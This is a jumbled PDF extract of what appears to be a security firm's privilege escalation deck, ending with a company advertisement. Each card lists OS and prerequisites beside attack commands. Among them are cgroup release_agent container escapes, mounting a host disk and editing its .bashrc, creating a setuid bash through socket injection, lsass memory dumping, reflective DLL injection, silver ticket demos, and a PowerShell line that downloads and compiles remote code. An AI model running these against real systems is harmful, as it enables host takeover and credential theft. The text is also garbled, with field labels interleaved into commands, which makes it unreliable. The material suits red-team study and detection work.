Type: Race Condition

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING USERMODE HELPER API

Domain: No d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`


mkdir -p $d/w; echo 1 > $d/w/notify_on_release
Local Admin: Yes t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c > $d/release_agent
OS: Linux echo "#!/bin/sh" > /c
echo "ps > $t/o" >> /c
Type: Abusing Capabilities chmod +x /c
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
Difficulty cat /o
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ESCAPE ONLY WITH CAP_SYS_ADMIN CAPABILITY

Domain: No mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp &&
mkdir /tmp/cgrp/x
Local Admin: Yes echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
OS: Linux echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo "#!/bin/sh" > /cmd
Type: Abusing Capabilities echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
Difficulty sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING EXPOSED HOST DIRECTORIES

Domain: No mknod /dev/sdb1 block 8 17


mkdir /mnt/host_home
Local Admin: Yes mount /dev/sdb1 /mnt/host_home
echo 'echo "Hello from container land!" 2>&1' >>
OS: Linux /mnt/host_home/eric_chiang_m/.bashrc

Type: Abusing Capabilities

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


UNIX WILDCARD

Domain: No python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/

Local Admin: Yes

OS: Linux

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


SOCKET COMMAND INJECTION

Domain: No echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x


/tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
Local Admin: Yes

OS: Linux

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


LOGSTASH

Domain: No /etc/logstash/logstash.yml
input {
Local Admin: Yes exec {
command => "whoami"
OS: Linux interval => 120
}
Type: Injection }

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


USODLLLOADER

Domain: No UsoDllLoader.exe

Local Admin: Yes

OS: Linux

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


Trend Chain Methods for Privilege Escalation

HADESS | SECURE AGILE DEVELOPMENT


HABANERO CHILLI

Domain: No rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Local Admin: Yes

OS: Windows

Type: Dll Side-loading

HADESS | SECURE AGILE DEVELOPMENT


PADRON CHILLI

Domain: Y/N #.\inject.x64.exe <Path to reflective dll:


.\LsassDumpReflectiveDLL.dll>
Local Admin: Yes

OS: Windows

Type: Create a Reflective DLL Injector +


Reflective DLL for dump lsass memory
without touch hard disk

HADESS | SECURE AGILE DEVELOPMENT


JALAPENO CHILLIES

Domain: Yes NihilistGuy.exe

Local Admin: Yes

OS: Windows

Type: unhook NTDLL.dll + dump the


lsass.exe as WindowsUpdateProvider.pod

HADESS | SECURE AGILE DEVELOPMENT


PASILLA CHILI

Domain: Yes https://github.com/tyranid/blackhat-usa-2022-demos


Demo5.ps1
Local Admin: Yes

OS: Windows

Type: SeImpersonatePrivilege + Abusing


Service Account Session

HADESS | SECURE AGILE DEVELOPMENT


FINGER CHILLI

Domain: No As an administrator, copy winspool.drv and mod-ms-win-core-


apiquery-l1-1-0.dll to C:\Windows\System32\spool\drivers\x64\3\
Local Admin: Yes Place all files which included in /bin/ into a same directory.
Then, run powershell . .\spooltrigger.ps1.
OS: Windows Enjoy a shell as NT AUTHORITY\SYSTEM.

Type: Abusing PrintNotify Service + DLL


side-loading

HADESS | SECURE AGILE DEVELOPMENT


ORANGE CAYENNE

Domain: Yes https://github.com/tyranid/blackhat-usa-2022-demos


Demo1.ps1
Local Admin: Yes

OS: Windows

Type: Silver Ticket + I Know

HADESS | SECURE AGILE DEVELOPMENT


RED CAYENNE

Domain: Yes https://github.com/tyranid/blackhat-usa-2022-demos


demo2.ps1
Local Admin: Yes

OS: Windows

Type: Silver ticket + User to User


Authentication

HADESS | SECURE AGILE DEVELOPMENT


BIRDS EYE CHILLI

Domain: Yes https://github.com/tyranid/blackhat-usa-2022-demos


Demo3.ps1
Local Admin: Yes

OS: Windows

Type: Silver Ticket + Buffer Type


Confusion

HADESS | SECURE AGILE DEVELOPMENT


SCOTCH BONNET

Domain: Yes https://github.com/tyranid/blackhat-usa-2022-demos


Demo4.ps1
Local Admin: Yes

OS: Windows

Type: Bring Your Own KDC

HADESS | SECURE AGILE DEVELOPMENT


LEMON HABANERO

Domain: Yes gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c


sudo setcap
Local Admin: Yes cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
./ambient /bin/bash
OS: Linux

Type: Environment Capabilities

HADESS | SECURE AGILE DEVELOPMENT


RED HABANERO

Domain: No BypassRtlSetProcessIsCritical.exe pid

Local Admin: Yes

OS: Windows

Type: NtSetInformationProcess + DLL


side-loading

HADESS | SECURE AGILE DEVELOPMENT


GHOST PEPPER

Domain: No https://github.com/sailay1996/delete2SYSTEM
.\poc.ps1
Local Admin: Yes

OS: Windows

Type: Directory-Deletion + Windows


Media Player d/s

HADESS | SECURE AGILE DEVELOPMENT


CHOCOLATE SCORPION CHILLI

Domain: No PS C:\> $code = (iwr


https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content

Local Admin: Yes PS C:\> Add-Type $code


PS C:\> $s = New-Object de.usd.SharpLink.Symlink("C:\Users\Public\Example\link",
"C:\ProgramData\target.txt")
OS: Windows
PS C:\> $s.Open()
PS C:\> echo "Hello World :D" > C:\Users\Public\Example\link
Type: allow low privileged user accounts PS C:\> type C:\ProgramData\target.txt
to create file system and registry Hello World :D
symbolic links PS C:\> $s.Close()

HADESS | SECURE AGILE DEVELOPMENT


CAROLINA REAPER

Domain: Yes https://github.com/tyranid/blackhat-usa-2022-demos


Demo6.ps1
Local Admin: Yes

OS: Windows

Type: Creates an arbitrary service + PTH

HADESS | SECURE AGILE DEVELOPMENT


THE INTIMIDATOR CHILLI

Domain: Y/N https://github.com/googleprojectzero/sandbox-attacksurface-


analysis-tools
Local Admin: Yes Import-Module NtObjectManager
Get-ChildItem NtObject:\
OS: Windows NT*

Type: manipulate memory/process token


values/NT system calls and objects/NT
object manager

HADESS | SECURE AGILE DEVELOPMENT


Resources
Privilege Escalation Techniques by Alexis Ahmed https://hackinparis.com/data/slides/2019/talks/HIP2019-
https://github.com/sagishahar/lpeworkshop Andrea_Pierini-
https://github.com/gtworek/Priv2Admin Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To
https://github.com/N7WEra/SharpAllTheThings _System.pdf
https://www.blackhat.com/html/archives.html https://forums.grsecurity.net/viewtopic.php?f=7&t=2522
https://github.com/Ignitetechnologies/Linux-Privilege-Escalation https://www.ired.team/offensive-security-experiments/active-
https://github.com/Ignitetechnologies/Privilege-Escalation directory-kerberos-abuse/privileged-accounts-and-token-
https://github.com/yosha28/WinAPISearchFile privileges
https://defcon.org/html/links/dc-archives/dc-26-archive.html https://www.youtube.com/watch?v=mwoWOWb3cPM
https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Cocomazzi-The-
Rise-of-Potatoes-Privilege-Escalations-in-Windows-Services.pdf
https://i.blackhat.com/USA-19/Wednesday/us-19-Wu-Battle-Of-
Windows-Service-A-Silver-Bullet-To-Discover-File-Privilege-Escalation-
Bugs-Automatically.pdf

https://attack.mitre.org/groups/
https://www.deepinstinct.com/blog/lsass-memory-dumps-are-
stealthier-than-ever-before-part-2
https://twitter.com/monoxgas

HADESS | SECURE AGILE DEVELOPMENT


About Hadess
Savior of your Business to combat cyber threats Contact Us
Hadess performs offensive cybersecurity services
through infrastructures and software that To request additional information about Hadess’s services, please fill out the form
below. A Hadess representative will contact you shortly.
include vulnerability analysis, scenario attack
planning, and implementation of custom
integrated preventive projects. We organized Website:
our activities around the prevention of corporate,
www.hadess.io
industrial, and laboratory cyber threats.
Email:
[email protected]
Phone No.
+989362181112
Company No.

+982128427515
+982177873383

hadess_security

HADESS | SECURE AGILE DEVELOPMENT


Hadess
Products and Services

SAST | Audit Your Products Penetration Testing | PROTECTION PRO

Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.

RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.

PWN Z1 | Audit Your PPP


Identifying and helping to address hidden weaknesses in
your organization’s security

HADESS | SECURE AGILE DEVELOPMENT


HADESS
Secure Agile Development

You might also like